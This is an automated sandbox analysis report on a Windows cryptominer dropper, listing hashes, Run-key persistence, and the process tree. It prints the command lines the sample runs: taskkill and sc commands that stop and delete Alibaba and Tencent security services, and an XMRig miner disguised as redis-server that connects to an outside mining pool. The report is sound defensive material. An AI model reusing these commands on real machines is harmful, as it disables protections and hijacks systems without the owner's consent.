Analysis
- max time kernel: 141s
- max time network: 143s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 04-05-2021 14:34

Static task: static1

Behavioral task: behavioral1
- Sample: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
- Resource: win7v20210410

Behavioral task: behavioral2
- Sample: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
- Resource: win10v20210408

General
- Target: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
- Size: 569KB
- MD5: c85e27470e88ad0d0449ab68ef18d0a3
- SHA1: 4791330c3acf353772c3d073cc52a619eb4cd7cc
- SHA256: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
- SHA512: 39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
Malware Config
Signatures
XMRig Miner Payload (1 IoC)

| resource | yara_rule |
| --- | --- |
| behavioral2/memory/4768-146-0x00007FF62FAB0000-0x00007FF630A1A000-memory.dmp | xmrig |
Executes dropped EXE (2 IoCs)

| pid | process |
| --- | --- |
| 3900 | htttp.exe |
| 4768 | redis-server.exe |
Stops running service(s) (3 TTPs)
Adds Run key to start application (2 TTPs, 2 IoCs)

| description | ioc | process |
| --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe" | htttp.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe" | htttp.exe |
Drops file in Windows directory (2 IoCs)

| description | ioc | process |
| --- | --- | --- |
| File created | C:\Windows\htttp.exe | 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe |
| File opened for modification | C:\Windows\htttp.exe | 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe |
Launches sc.exe

Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices (1 TTP)

Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Enumerates processes with tasklist (1 TTP, 4 IoCs)

| pid | process |
| --- | --- |
| 860 | tasklist.exe |
| 1396 | tasklist.exe |
| 1560 | tasklist.exe |
| 1820 | tasklist.exe |
Kills process with taskkill (10 IoCs)

| pid | process |
| --- | --- |
| 2288 | taskkill.exe |
| 2520 | taskkill.exe |
| 4524 | taskkill.exe |
| 4608 | taskkill.exe |
| 972 | taskkill.exe |
| 2960 | taskkill.exe |
| 1568 | taskkill.exe |
| 2096 | taskkill.exe |
| 3112 | taskkill.exe |
| 4572 | taskkill.exe |
Suspicious use of AdjustPrivilegeToken (16 IoCs)

| description | pid | process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 860 | tasklist.exe |
| Token: SeDebugPrivilege | 1396 | tasklist.exe |
| Token: SeDebugPrivilege | 1560 | tasklist.exe |
| Token: SeDebugPrivilege | 1820 | tasklist.exe |
| Token: SeDebugPrivilege | 1568 | taskkill.exe |
| Token: SeDebugPrivilege | 2288 | taskkill.exe |
| Token: SeDebugPrivilege | 2520 | taskkill.exe |
| Token: SeDebugPrivilege | 2096 | taskkill.exe |
| Token: SeDebugPrivilege | 3112 | taskkill.exe |
| Token: SeDebugPrivilege | 4524 | taskkill.exe |
| Token: SeDebugPrivilege | 4572 | taskkill.exe |
| Token: SeDebugPrivilege | 4608 | taskkill.exe |
| Token: SeDebugPrivilege | 972 | taskkill.exe |
| Token: SeDebugPrivilege | 2960 | taskkill.exe |
| Token: SeLockMemoryPrivilege | 4768 | redis-server.exe |
| Token: SeLockMemoryPrivilege | 4768 | redis-server.exe |
Suspicious use of WriteProcessMemory (64 IoCs)

| description | pid | process | target process |
| --- | --- | --- | --- |
| PID 4804 wrote to memory of 3900 | 4804 | 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe | htttp.exe |
| PID 4804 wrote to memory of 3900 | 4804 | 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe | htttp.exe |
| PID 4804 wrote to memory of 3900 | 4804 | 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe | htttp.exe |
| PID 3900 wrote to memory of 812 | 3900 | htttp.exe | cmd.exe |
| PID 3900 wrote to memory of 812 | 3900 | htttp.exe | cmd.exe |
| PID 3900 wrote to memory of 812 | 3900 | htttp.exe | cmd.exe |
| PID 812 wrote to memory of 860 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 860 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 860 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1396 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1396 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1396 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1560 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1560 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1560 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1820 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1820 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1820 | 812 | cmd.exe | tasklist.exe |
| PID 812 wrote to memory of 1568 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 1568 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 1568 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 2288 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 2288 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 2288 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 2520 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 2520 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 2520 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 2096 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 2096 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 2096 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 3112 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 3112 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 3112 | 812 | cmd.exe | taskkill.exe |
| PID 812 wrote to memory of 3352 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 3352 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 3352 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 3880 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 3880 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 3880 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4060 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4060 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4060 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4480 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4480 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4480 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4068 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4068 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4068 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4052 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4052 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4052 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 1940 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 1940 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 1940 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4040 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4040 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4040 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4564 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4564 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4564 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4576 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4576 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4576 | 812 | cmd.exe | sc.exe |
| PID 812 wrote to memory of 4524 | 812 | cmd.exe | taskkill.exe |
Processes

- C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"
  Signatures: Drops file in Windows directory; Suspicious use of WriteProcessMemory
  - C:\Windows\htttp.exe
    Command line: "C:\Windows\htttp.exe"
    Signatures: Executes dropped EXE; Adds Run key to start application; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\run.bat" "
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\tasklist.exe
        Command line: tasklist /FI " IMAGENAME eq Ali_update.exe"
        Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\tasklist.exe
        Command line: tasklist /FI " IMAGENAME eq aliyun_assist_service.exe"
        Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\tasklist.exe
        Command line: tasklist /FI " IMAGENAME eq aliyun_assist_update.exe"
        Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\tasklist.exe
        Command line: tasklist /FI " IMAGENAME eq aliyun_installer.exe"
        Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM aliyun_assist_service.exe
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM aliyun_assist_update.exe"
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM aliyun_installer.exe"
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM Ali_update.exe
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM AliHids.exe
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc stop "Alibaba Security Aegis Detect Service"
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc stop "Alibaba Security Aegis Update Service"
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc delete "Alibaba Security Aegis Detect Service"
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc delete "Alibaba Security Aegis Update Service"
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc stop "BaradAgentSvc"
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc stop "StargateSvc"
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc stop "QPCore"
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc delete "BaradAgentSvc"
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc delete "StargateSvc"
      - C:\Windows\SysWOW64\sc.exe
        Command line: sc delete "QPCore"
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM QQProtect.exe
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM sgagent.exe
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM BaradAgent.exe
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM YDLive.exe
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /F /IM YDService.exe
        Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\Temp\redis-server.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true
      Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Temp\redis-server.exe
  MD5: 0c4ae60bb07bd7c084ca66b844fa0b4b
  SHA1: ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
  SHA256: 31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
  SHA512: 5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d
- C:\Users\Admin\AppData\Local\Temp\run.bat
  MD5: f1cc668d01eeb779b1fc1044541fc1d4
  SHA1: 45bd782881b31eb2868fc211b19af2cb627a9d0d
  SHA256: 62fdc9b8581a931ac987446ab4c8547bb9f94d9caf8e61c3d0d95ec033e73929
  SHA512: 293263607a850f2bb6873924b6606b83c7ea0dbd9fa07c0d8958be9e64aa1b27e24a0cf213b89906b3919c32da3c265d3ae9df07430ab4441b7289b3e935c33e
- C:\Windows\htttp.exe
  MD5: c85e27470e88ad0d0449ab68ef18d0a3
  SHA1: 4791330c3acf353772c3d073cc52a619eb4cd7cc
  SHA256: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
  SHA512: 39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
- memory/4768-146-0x00007FF62FAB0000-0x00007FF630A1A000-memory.dmp
  Filesize: 15.4MB
- memory/4768-147-0x0000020D1E2C0000-0x0000020D1E2E0000-memory.dmp
  Filesize: 128KB